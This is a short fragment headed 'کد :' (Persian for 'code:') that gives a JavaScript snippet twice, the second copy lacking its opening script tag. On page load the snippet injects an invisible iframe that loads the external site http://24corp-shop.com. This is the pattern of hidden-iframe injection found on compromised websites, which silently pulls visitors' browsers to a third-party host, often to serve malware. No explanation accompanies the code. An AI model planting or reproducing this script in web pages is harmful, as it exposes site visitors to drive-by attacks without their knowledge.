کد :
<script>
if(document.loaded)
{
showBrowVer();
}
else
{
if (window.addEventListener)
{ window.addEventListener('load', showBrowVer, false);} else { window.attachEvent('onload', showBrowVer);}} function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '180px'; js_kod2.height = '200px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2);} </script>
if(document.loaded)
{
showBrowVer();
}
else
{
if (window.addEventListener)
{ window.addEventListener('load', showBrowVer, false);} else { window.attachEvent('onload', showBrowVer);}} function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '180px'; js_kod2.height = '200px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2);} </script>